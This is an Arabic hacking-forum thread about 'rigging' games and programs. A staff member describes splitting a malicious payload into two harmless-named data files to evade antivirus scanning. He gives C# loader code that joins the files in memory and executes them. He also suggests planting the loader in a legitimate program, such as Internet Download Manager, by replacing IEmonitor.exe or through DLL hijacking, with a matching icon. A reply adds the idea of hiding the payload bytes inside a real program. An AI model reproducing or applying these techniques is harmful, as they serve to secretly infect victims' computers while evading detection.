10.05.2017 تلغيم الالعاب والبرامج


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
ليش نقسم ونحط بالريسورس او الامبيديد ريسورس
او حتى نحوله ل بيس64 او اي خوارزمية اخرى
او حتى ليش لنضمن اي من قيم السيرفر بالسورس باي شكل لها
ليش مانقسم السيرفر الى قسمين "مثلا" وتسمية كل منهم مثلا
data.dat
database.dat
او ان شئت
gamedata.rar
gamefile.rar
dll او اي امتداد تريده
ومن ثم نقوم ببرمجة تطبيق مهمته انه بيشوف المسار وين مكان الملفات بجهاز الضحية
ونحن منكون معرفين له اسماء الملفين مسبقا
بيجي برنامجنا بيجمعهم سويا بالذاكرة عند عمل لود
وبشغلهم حسب فانكشن قمنا بكتابتها من زمان :29:
طيب اللي عنده مشكلة انه كيف يكون rar وحجمه 16 كيلو ذكرت لك الحل بالفديو
كيف تزيد حجم ملفاتك بالهيكس ممكن تسوه 50 ميغا مابياثر
الجزء الثاني من قيم السيرفر والملف اللي بيجمع لك الملفين فينك تزيد الحجم مالتهم
بس الجزء الاول لا حسب التقسيم اللي سويناه
ممكن اقول ممكن ان كان التقسيم غير ذلك كمان بينزاد
ماجربت ولارح جرب لان كل موضوع بنزله بتركه على الآخر
الا ان خطر على بالي تحديث وتطوير له فبرجع له
هنا الاكواد
C#:
static void Main()
        {
            var dir = Directory.GetCurrentDirectory();
            var  b1 = File.ReadAllBytes(Path.Combine(dir, "datamaps.dat"));
            var b2 = File.ReadAllBytes(Path.Combine(dir, "datagame.dat"));
            System.Reflection.Assembly.Load(gg(b1, b2)).EntryPoint.Invoke(null, null);
        }
        static byte[] gg(byte[] b, byte[] c)
        { byte[] total = new byte[b.Length + c.Length]; Buffer.BlockCopy(b, 0, total, 0, b.Length); Buffer.BlockCopy(c, 0, total, b.Length, c.Length); return total; }
    }


الناتج للملفات الثلاثة كلين مثل ماقلت "شوف الفديو عشان تعرف القصة"
Multiple results - Jotti's malware scan
تشغيل الملف اللي بيجمع الملفين "باي امتداد كانو"
هذه عليك بس انا قلت لك افكار بالفديو "مطبقها"
منها تلغيم Idmn مثلا بتشوف ثغرة dll هايجاك فيه او باي برنامج اخر
او باسهل الطرق اغلب البرنامج ومنها idmn فيه ملف اسمه IEmonitor.exe
هذا بيشتغل كل مااشتغل الانترنت داونلود منجر
غير ايقونة الملف الناتج من سورسك بنفس الايقونة وارفعه مع الملفين ومبروك عليك
طيب لا ماتريدها شوف ادمج الملف الناتج مع البرنامج الهدف وخلهم يشتغلو سويا
الفديو بالمرفقات او من هنا
 

المرفقات

التعديل الأخير:

Matrix0

:: عضو ::
22 نوفمبر 2018
52
40
ويندوز
0
طريقة جميلة وتنفع انو ممكن نضيف بايتات السيرفر تبعنا في برنامج الحقيقي طبعا برائي ما ينعطل البرنامج الحقيقي ومن ثم نقول للملف الصمم انو ااقراء الملف من رقم كذا الي يبدا بسيرفر تبعنا وهكذا
الله يجزيك الخير اخي بشار على تعب ^_^
 
  • أعجبني
التفاعلات: BasharBachir